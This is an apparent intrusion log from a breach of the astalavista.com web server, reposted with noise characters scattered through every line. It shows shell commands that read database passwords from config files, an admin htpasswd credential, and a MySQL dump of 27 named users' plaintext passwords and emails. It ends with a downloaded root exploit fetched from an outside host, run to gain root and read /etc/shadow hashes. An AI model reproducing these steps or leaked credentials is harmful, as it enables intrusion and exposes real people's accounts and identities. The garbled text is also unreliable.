drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
+ G7 n' r' T, P& Xdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
4 ~ J" w) [; B0 u# J# j, W+ c: Vdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com) Y$ B V8 i5 a$ a
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend" j( `: d$ N& c% y& t1 I
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner# j: ]. I: a; T4 x* C" r' }) x
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg g: `$ B% |% U+ g* X
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
! V5 x: |+ C8 d6 jdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron( ~" i& u4 e/ k' y) `6 R/ A S4 R+ u
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
Y. T% F t2 h& e2 Y* d/ b-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
7 @& k' G0 D5 F6 x-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico( M% \5 b% K3 k4 ~
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
) H% R5 I8 ]* Idrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour E4 F# D& a6 O. [7 M4 A
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
8 S: G6 Y i" V7 c, j/ i4 J# H-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
* m* X/ p \, c _' }- P6 T-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php6 X: q% ^6 g# a7 A! E. `/ T( A/ x
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
" f0 ?# r1 j" _8 t6 J, e9 T3 Q-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php& |) Z9 ]! v# b/ B! Y/ `
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php4 T) M) w! Z2 I5 [
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf. U& b4 k0 H( y) {6 b
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc" r) L0 y' l7 \8 [1 V
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang' `- ~6 ~' @& w$ v
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib$ C: u: \3 g. H. N* y" E& F+ A
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log6 G; @' `; U" K+ { |; B' e
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
7 P! M/ T7 f% _$ B m6 _" Kdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata& A; ]0 }$ l; Q- ~5 n* D, v: c
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
7 I1 k3 ~0 `: ]9 E4 I-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
' D* u. d$ E; x0 u5 `drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
4 ^% E9 _4 N! ~4 a# G-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt/ b6 e9 E) [* K" k
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
5 a4 e9 M# K) \- s2 B: Z: d6 \drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
2 F: \( w" x4 y! G' Q2 Bdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
, V3 m& @+ L0 t& u- h& _9 k# H; odrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
8 r. `! X5 {1 qdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
+ a! @" C; k5 U6 k- V9 o+ Fdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl1 R. H2 ~* [: x
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v22 H) b4 p- y; ~" a9 r
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
! t! ^; x7 ~! X/ p4 t0 K-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
& n) ^" x6 w2 j; }& {! s$ e2 `$ idrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
o9 u7 t2 q0 q% R e' s1 q
) J; I" s+ K7 o, v& L! x0 G8 w0 ]sh-3.2$ head -20 index.php
8 x! t3 R ^) |( {4 @8 V L1 f<?PHP+ [4 f) c9 R5 D( ?( g
/**+ }0 C' \( s0 T7 w9 |. X, b5 d; R
* Mainfile (external) for astalavistaNET v2.0
+ y9 G6 K. m; o# b2 G*
, ]3 ^$ g# A, ^, O$ ], F, C, g* @copyright Astalavista IT Engineering GmbH
# Z6 g, [7 ~9 o3 i6 Q* b& W* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
: q. Q4 ^( C( B9 u2 F9 G* @version 1.0
. ~# l. Y, W7 b& E*/
^6 O+ I+ r* p/ S, w* I" g
* b6 R% r( w% C. o if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
" C" a' M ]- x; y+ |) { $dontStartSession = false;" V9 M% W& e" E
} else {
* z: }5 m* M9 C $dontStartSession = true;; W* @7 Y& r+ M' z8 {
}
+ A/ M! A5 Z4 J7 T require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);. H/ ^8 v5 ~' [1 U, M5 m! f
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
2 g; `, i. V$ o, h require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
I& X% y' A, K+ z; [& i% y require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);- O( ^7 I8 y% a+ H( q
" z* {6 `: ^/ r# p0 h
sh-3.2$ cd config
, ?1 c% @" ?; | T3 vsh-3.2$ ls -la
2 Z# R3 {$ V" z0 C6 B7 Ktotal 32
- h+ d" F2 |' F0 |! D0 jdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .* d+ @ `- A& S9 r
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..( I" d1 Z q2 s" `
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
8 l# J7 r" q% ?0 D ]9 `: l( Y, e-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php! g [% m( s6 `: I
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php3 W1 R% J' O2 m- X
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
0 @# \ T6 k% _0 N' E-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
9 G* Y3 i$ T, i7 D) \! C; V6 {
8 E+ o0 u1 L0 R% M! v" V- tsh-3.2$ cat com.conf.php- A0 W1 s' [' |. x4 \
[snip]
! Y5 U, J7 w2 E' b- k//member-database
1 w' p/ O( ]6 S7 n% s" \$_CONFIG['db_mem_server'] = ‘localhost’;$ i0 ^' [4 T4 D# g
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;3 G6 r$ ?3 b9 X' e. V
$_CONFIG['db_mem_user'] = ‘astanet_db’;/ M, T h- e+ @2 S W4 ?
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
; _' Q8 E/ y6 G. k2 Z) G1 t$_CONFIG['db_mem_debug'] = false; //true or false# {1 R# V6 e7 z% _
//ads-database4 c% N9 l# h, Y: R
$_CONFIG['db_ads_server'] = ‘localhost’;
- g4 l) b. H. [ J8 e1 `- ?$ A$_CONFIG['db_ads_database'] = ‘astanet_ads’;0 Z8 h6 {9 K( k" K( d
$_CONFIG['db_ads_user'] = ‘astanet_db’; N! X. [, j9 j
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;$ ]3 S" p% m) z, N. a3 K8 x7 z
$_CONFIG['db_ads_debug'] = false; //true or false
h' X; v1 e# |0 J- d2 P# c//rainbow-database' E* w9 ` J+ U# P0 d/ Z
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
0 R+ m/ N3 w& L$_CONFIG['db_rainbow_database'] = ‘rainbow’;. X0 {' b; \+ k' L6 P9 \4 ]
$_CONFIG['db_rainbow_user'] = ‘dinu’;0 s; \' J5 o# E. g5 m) ]
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
4 r0 F a2 L. \8 U3 \ w2 g2 _( A$_CONFIG['db_rainbow_debug'] = false; //true or false
' |6 j8 ?. V& @6 |//mailing lists database
3 x/ N8 Y( }" K# j$_CONFIG['db_mailing_lists_server'] = ‘localhost’;1 g, o# F6 @ }( H2 |+ y) l
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
# [$ D: Z% p, r! x$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;# w( m# J+ B8 u
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
; M- ?4 [5 W# O, u$_CONFIG['db_mailing_lists_debug'] = false; //true or false6 r+ x3 I3 _( I2 p. B
//paypal; V E; S. u$ b4 _. r$ F4 d9 |) e |
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
, p& G c" q! f+ r/ ~1 m" O$_CONFIG['sub_pp_cmd'] = ‘_xclick’;5 |9 B8 k2 K7 g. A8 T, Y9 j* F
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;) B" E7 n! n" u: }! }) p. k
$_CONFIG['sub_pp_noship'] = ‘1′;+ F# x' S* f+ ?0 A/ L
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
1 o* J; h+ T& ~+ b5 K[snip]( w4 f* m( a8 Y
0 E: E) B, E0 T9 |; B( r0 B
sh-3.2$ cd ..% a8 M: l/ g% T- x5 K5 n! `6 R4 t
sh-3.2$ cd member$ {* A" A$ q2 U' G
sh-3.2$ ls -la+ X: ]* e7 ? v) T6 M% Y
total 20
0 }% d" ]" y6 b' Bdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .: Q; |9 I6 D/ q
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
4 }6 u# n, r) ~9 f" Q& I. K-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess6 Y: d0 k( I& Z
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
1 b# x5 x, H: ush-3.2$ cat .htaccess
; O0 s4 @+ P: h8 y" @8 kSecFilterEngine off
H) x% z; x0 B" c+ r( `. }& M+ v; n/ _1 n' t0 m
sh-3.2$ cd ..0 m f4 e, S! f; H
sh-3.2$ cd cron- ?$ R I) S1 m1 T
sh-3.2$ ls -la
g3 \3 F7 G$ f& Wtotal 168
1 v7 ]% k# ~( h* tdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .# O- I4 b' E& d( ]$ ^3 k3 ]/ O9 {% O: s
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
0 R7 K" ?2 `$ W9 c' [" P-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php$ J4 ?. I1 o2 P3 E+ r: v
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php' n9 F) x ~0 C1 c3 U- } Z
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php5 Q( b7 l2 [, \$ O/ o- n% _
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
& Y3 t$ g+ k2 H2 ^ g-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
* F) c; z1 V: ^, o" d5 F-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
, ]7 C/ y8 m1 Y# l-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php l5 {1 \. s- C4 e. f4 D
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php! s7 U* U# o3 V" W& A# P8 x
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh' i* J3 H# d2 Y6 S' e
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
9 F$ d- {4 S& `1 X9 [* ^1 Y. Q, U-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php# |9 z0 o- C; y, e- c& u
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php( f: h' t* j: h6 A
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
( _6 Z ^1 k/ J# H5 z-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
* W/ t, \( U! T/ n-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php# w$ n O7 n* F0 N( X9 d7 g
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php) V% R8 K; \, y" t0 U( C7 B; l
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
N$ R$ r% u5 q/ a. ~$ r- e-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
' q& _5 {9 x( c0 _drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
5 P. x) M5 Z9 w-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php0 \+ B0 ~; r5 f* e0 `, p# f
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
0 W! B$ D4 _5 S4 P! D. Y O2 o
( K: y, r* @8 w* vsh-3.2$ cd ..
& x1 p& r2 D: ^0 y- r l3 \sh-3.2$ cd _0071 O {* M- J3 V- H# ?0 J; t. p
sh-3.2$ ls -la" |5 }. N7 R, O+ a# Z2 R* M
total 24
\4 {/ \" c; wdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
% T- C% R9 C adrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..+ H$ `1 z" g' b
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess3 V- P6 y; A. v3 Y1 ?
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php5 w- I$ H5 Z ~# E* h
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php9 \: H" s5 v. i
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
5 y6 \. P# L7 G' \" P2 q+ }- \0 K' G" N4 M
sh-3.2$ cat .htaccess2 y9 X& P3 d( l) D( T7 Z0 q7 N' v
authType Basic
, v5 {3 Y2 u o- C; o7 H& ]authName Admin
2 w: |. q$ {( X* A2 o8 v! Z8 sauthUserFile /home/astanet/auth/.htadm_pwd
" x8 O* M' s! h; c! r+ b0 Z7 Hrequire valid-user
: U* K5 `4 i; E3 C S. z, \0 u9 R5 n2 V
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
# s Z$ \. m% Q) |" k7 }9 D6 Eadmin2net:CR0bl65MwhfT
2 b: S/ w: e, x3 c9 }9 u4 O( U5 K2 S
sh-3.2$ mysql -u astanet_db -p
7 _# U- x3 o2 w* KEnter password:4 U1 z3 h: p+ g: P, h' B
Welcome to the MySQL monitor. Commands end with ; or \g.
+ G2 m1 A* H, |% a0 RYour MySQL connection id is 275153
! T% e2 {( ^2 Z6 `* T& h) x9 J; QServer version: 5.0.45-community-log MySQL Community Edition (GPL)
+ _- `2 R& k, Y- _! H& \: K5 g9 }/ o
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
9 R: @ [8 U4 i' r% ]3 g+ g: l4 W( ` n
mysql> show databases;
/ p. M/ Q- ^/ w1 h7 a$ V+———————–+; R+ i% [8 p @9 R+ g! _
| Database |
8 Q! G3 T$ I& ?1 s5 `& r3 V6 {+———————–+
! S$ F) \6 p O# n9 _5 Z| information_schema |
. k" e4 U' H# Z6 X8 _| astanet_ads |! D1 C: H4 g2 f
| astanet_mailing_lists |3 i Z# o( e) n& ?
| astanet_mediawiki | p5 e5 ]& v# N* O# P
| astanet_membersystem |
1 t( L- _0 u" x8 L, L| test |
1 ^: j% p9 Q7 Z9 {* m, _+———————–++ }2 Q' \0 t/ H! ?$ |' Q2 l6 P" ^, Y
6 rows in set (0.00 sec)
6 n5 r* ~! P# o0 S7 r
$ O9 N6 o* h* Xmysql> use astanet_membersystem# b+ }5 {( R% U" V/ G- G
Database changed
+ a. |5 c3 F0 l2 }5 L# [" ^mysql> show tables;
! }$ C; c& e& F# N8 O+———————————–+
# }/ V6 L6 l8 g/ s% j0 S, i; f; R| Tables_in_astanet_membersystem |: o6 O* t* n' J4 g9 \- e; S: |
+———————————–+4 F$ `# x- y4 ~
| blacklist_categories | ^; j) `3 @; L6 @1 X, h5 P
| blacklist_content |
7 h2 O' j9 C) A| blacklist_levels |6 V' [3 b3 Q- f0 F0 L
| blacklist_mcset |$ F5 g8 _7 F% l9 f& O% J
| dir_categories |" D( n: ?! U1 h+ [6 Y- `- [
| dir_comments |
D5 V7 l5 \+ w4 J& t& M| dir_links |
2 `9 r* V$ E( X% u) A+ S| dir_temp |* h& ]1 ^7 { Y% V6 P
| dir_votes |9 h: D1 K3 O) C; o6 T& w/ N
| documents |
: J7 B' M% J% R| documents_categories |
+ V* l; @' O/ X+ D: W| email_content |3 @" D+ \0 P$ j
| email_settings |
6 D7 M, Q* s, Y- p| exploits |/ l/ e( S; O! _7 e/ J6 B/ N6 {; a" c% W5 d
| exploits_categories |
0 H7 c/ M0 E( ~: E5 \| exploittree_categories |+ }1 X5 m! f) p$ p, P( }8 y
| exploittree_exploits |1 Q2 Q: e& l1 W7 x$ x9 E4 \
| home_values |( t7 x# S: s4 Q& U4 v& Y
| iso_countries |
$ c; K) g3 A$ Y4 E) `) j| links_categories |- U: T/ d/ H/ r% Q4 D1 R! d% m' X
| links_records |
: \' r, J9 f1 x$ q9 ]$ o/ || links_unauth |
( q. W: ]! ?1 _& p$ D2 K5 Q| links_votes |" l% Q: s$ b1 ?% p S0 k$ g& E
| log |0 I9 `" ~$ ?9 L% b' N5 Y
| news_categories |1 r" _. Y3 l# U: u. K4 @
| news_comments |; d3 c" H& W& K7 n3 q) k
| news_emoticons |
9 e9 w/ `# i R4 U$ t| news_latest |) c- C/ b: J' `# m6 _9 R3 M& o: Q7 U
| news_messages |
3 i3 w2 U2 a. v+ u( q| news_statistics |
9 ?( o! Z, C8 s2 k/ J| news_votes |* i7 G1 x8 D4 _, j" k5 ^
| prices_content |* H9 b6 I* i! {
| prices_offers |
8 U$ X1 |8 f( ]4 I2 ?! Z. e+ n| rss_settings |
1 e1 B9 p8 ?; d1 |: v| sessions |
0 K$ a* V& V. G| stats_signups |
+ q- ^8 U1 [1 a8 \9 E& E| u2u2 |
/ `3 q' E( S4 W) p$ l5 M| u2u_contact |1 D9 s8 E# }$ M
| u2u_settings |
8 _* B! M: }$ m- j| user_keywords_selected_categories |- s% }2 p# C* g E) w+ m
| users |
0 Q4 S: l, C$ P, _+ E: j3 E| users_ipn_test |
; f8 m! Z: _# h$ {" C| users_keyword_values |
* M* P! k ?; Y5 m; `0 J" E# F| users_profile |+ |! ?. v6 S* g0 }3 i! Q [9 y
| users_temp |6 P8 k/ `+ \3 {# T
| users_upgrade |# {+ L: d4 j$ U1 N& P
+———————————–+
v' M: f1 P# X# h. }46 rows in set (0.00 sec): T- q7 N" x: k+ W; \
9 m9 b* z1 h' `! E
mysql> describe users;
) H) ` u3 L' d+————————–+————————————–+——+—–+———————+—————-+
0 Z, R1 h; D4 I) y1 ^5 w| Field | Type | Null | Key | Default | Extra |
- C+ ]* e& {6 k+————————–+————————————–+——+—–+———————+—————-+
2 Y$ O: w' A* w. V( ], W| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
! n( a, Q7 w7 s A4 H8 Q| user | varchar(50) | NO | | | |
! _+ N: p1 Q6 |+ a# q| nickname | varchar(30) | NO | MUL | anonymous | |' h" g$ H0 h" B4 p; I+ P( c
| password | varchar(30) | NO | | | |, N+ @. `, o0 \/ c) d3 _
| userlevel | tinyint(3) | YES | MUL | NULL | |: I$ ~) k4 m9 } @' ?
| exp | int(8) unsigned | NO | | 0 | |- B1 r3 B. @% |: [# T' a
| email | varchar(50) | NO | | | |0 A6 \7 i% _9 N; _
| ip | varchar(15) | NO | | 0 | |
% e: U; w3 Y* {' x| proxy | set(’0′,’1′) | NO | | 0 | |6 e; P3 G( K' _% C
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
2 A$ C1 P" o3 e& _" M! ~. D| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |* T8 S. `" R, A5 B) `( o0 _
| anz_in | tinyint(1) | NO | | -1 | |5 K" S- P' t' }- Z" ~1 g
| status | tinyint(1) unsigned | NO | | 0 | |: V2 b6 v9 ]9 C7 M4 G3 K/ O
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
# O! {% r8 z8 o4 E% L( j; [9 r' _9 i| freemember | set(’0′,’1′) | NO | | 0 | |; X. L' u2 [! ^" @$ T6 T9 C& E9 H
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |$ a+ F$ l5 G( S+ b) O2 |/ k. t
| lang | tinytext | NO | | | |3 G# Z1 O0 \) \0 C4 {( N2 p
| adid | smallint(6) | NO | | 0 | |
; U. d+ d0 y/ t# a" [9 [" G: S' U- O| pp_txn_id | varchar(255) | YES | | NULL | |* i4 J0 a! \9 G$ [& C& l6 q$ R
| cnb_transaction_id | varchar(255) | YES | | NULL | |% [# ?, h+ ^; x K% ?% A' u; d
| cnb_order_id | varchar(255) | YES | | NULL | |) b. u" G% n- w5 s& \
| cnb_user_id | int(11) | YES | | 0 | |
3 S S. H. o8 ^0 {% _" U8 K+————————–+————————————–+——+—–+———————+—————-+
3 X+ y; }5 D4 T( R# Y22 rows in set (0.01 sec)
2 Y l4 ]- a+ X) O& f. D
5 i2 l5 p/ r3 b. `. kmysql> select count(*) as skids from users;; q: E2 t" C! E7 ?" t
+——-+
3 j) n: ]7 j7 n7 U" w( D| skids |
( Z' q8 {$ ~, F6 j+——-++ J' V2 R& \' t6 d- t# G U% d) `0 J2 T
| 25199 |
6 N. j( Q0 X2 i- o( ~, F' o5 I+——-+. k! N% t. R0 H" \4 i& n' H2 n
1 row in set (0.00 sec)- K6 A; _7 b* \' s
( O0 P2 j( z1 D
mysql> select user,nickname,password,email from users where userlevel = 1;3 a3 V( F0 W3 u8 ]9 B7 Q5 x3 C
+————————–+———————-+——————+———————————–+5 m. K' U3 B3 u4 n% w
| user | nickname | password | email |8 ~; }* |7 e2 g4 |8 e9 v+ R
+————————–+———————-+——————+———————————–+
4 a+ D5 _5 w* a% v# j( V| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
* F# I, R# g- w# v3 v. o3 ?! j' z| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |# ?( t# \0 f0 n4 ~) ~
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
) J7 B9 O3 @ k0 v! G| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
( ] N* `: B! m| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
, J& U& K) W [7 f& h' H4 _0 X, R| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
& `$ ^- x+ z$ W| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |; j' ?. \, u/ K. m
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
4 k6 P4 a8 c! R; ?- w9 G5 F: d" Q| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
/ N+ d. U, X3 U' {) S1 I5 G| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
6 x& V! \* W7 E( z, R3 X| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
" m+ p6 M' { V: s& s7 O| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
% N2 I- ?# T8 E; R7 Y| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |( Z6 x, [) p6 `0 S
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |6 i; r2 h0 c9 @
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
, Z$ w5 A* F: d# v( ~6 x0 X" f w| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |0 W9 ` t: M6 O' p; j
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |% W. h; o3 s' ^7 G6 Y, o
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
9 E" o. Y# o' u3 \+ s| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
3 N4 F1 _+ W2 K2 n1 w" f+ U3 @/ H% i| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
. I ]9 E/ j5 A% ^. U9 [6 y# m| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
P _7 I( Q. g% g8 l5 B' i| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
4 r# f9 j x r7 c' c, U| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
# M6 p# Y$ ?. b7 l4 t: e, q9 x" b| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
0 w# J: Z8 ^9 x8 \, \- l+ t| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
8 R. b0 m) p. F% l| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
( F( M, \, v0 I' Y| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |7 g+ I3 V& T% O% O% A
+————————–+———————-+——————+———————————–+
$ J* n" O6 f! A9 g, |27 rows in set (0.00 sec); S+ W5 @. n8 w! c# O( k) e' F
3 ? q/ m% x( u7 y$ t, R7 l' E. amysql> exit;& ~5 E5 d0 T" ^! X; P
Bye
/ M# G6 }$ c) W5 m1 {/ }" p4 @9 d/ J% ^2 k4 ?
[~] plaintext passwords? yes, j7 v6 [# H( t' b/ C/ P, K! o& H5 G
Those so called “security professionals” who charge you $6.66 / month to: a% \3 G, x4 |8 U% d+ W1 Y
register at their hack-proof portal, save your passwords in plaintext…
5 k7 W M6 Z v Fbrilliant!( q# d8 Y3 ]$ a, x
- x6 e( j) B/ u+ Q) L p[~] This been fun but we want more.% Z+ q+ L4 r7 d0 z I
" T7 E. v' z! \* p1 J, L7 N
sh-3.2$ uname -a8 Y, t% b: C3 n! Z+ z0 _ _
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
$ a3 O5 e: x, a& U3 ]sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]+ h3 w: V- v& S. X0 C) ]
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]* G, E5 M3 J5 ?$ h+ _# c+ d
Resolving anti.sec.labs… 13.33.33.37
9 M* R; J$ F: w5 q$ w, `Connecting to anti.sec.labs|13.33.33.37|:80… connected.
3 y% K1 Z5 I. Z- rHTTP request sent, awaiting response… 200 OK2 a/ J9 f# y6 I
Length: 18200 (18K) [text/plain]
) W9 E) c0 @, H: ~7 ?) C1 oSaving to: `g0troot’; H- M; }) r+ o( V7 a2 |
) ^9 X" u' \' g9 x$ i! k. g100%[=========================================================================================================================================>] 18,200 58.6K/s in
1 K$ r+ L; S' A$ m$ B0.3s; a" m) J' I9 x1 V# {; V% y
& g$ @3 M, R+ _
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
6 [/ s% E$ \% {2 {* S0 R+ J0 q: w
sh-3.2$ ./g0troot -i x86_64/ n8 {! ~1 v( N& f
[+] g0troot - anti.sec.labs
6 F" O: Q" \ m4 J" n[+] Target: 2.6.18-128.1.10.el5
7 [" |4 E/ T( T- |( z+ m# ^[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
" ~7 f/ k( O# P, C4 t# v4 z4 ^+ S- V7 A0 b5 W! k& l8 ` ]2 |# n' Z
[+] r00tr00t
, B3 W4 v$ T. m- c6 \$ i[~] Executing shell…7 g) Z' q p* l; ]/ J# I* R' J
/ W- J. G8 x' T4 k5 Z2 W c
sh-3.2# id
7 w0 o; c; ]$ [( x. _uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# w1 S3 ]3 }# G9 `: p5 Q
# n6 p' p) F; Q6 X) k1 nsh-3.2# cat /etc/shadow* m& @, d7 h3 @* Y
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::. H" y! B E, \2 o) V9 k
[snip]& G* W! N$ q. H. H2 I0 h
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::1 o; @1 R6 A7 w! P( T% k/ m
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
8 N3 z+ ~) P' c2 z7 x! P( bcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::) X) B1 I" `& f+ W
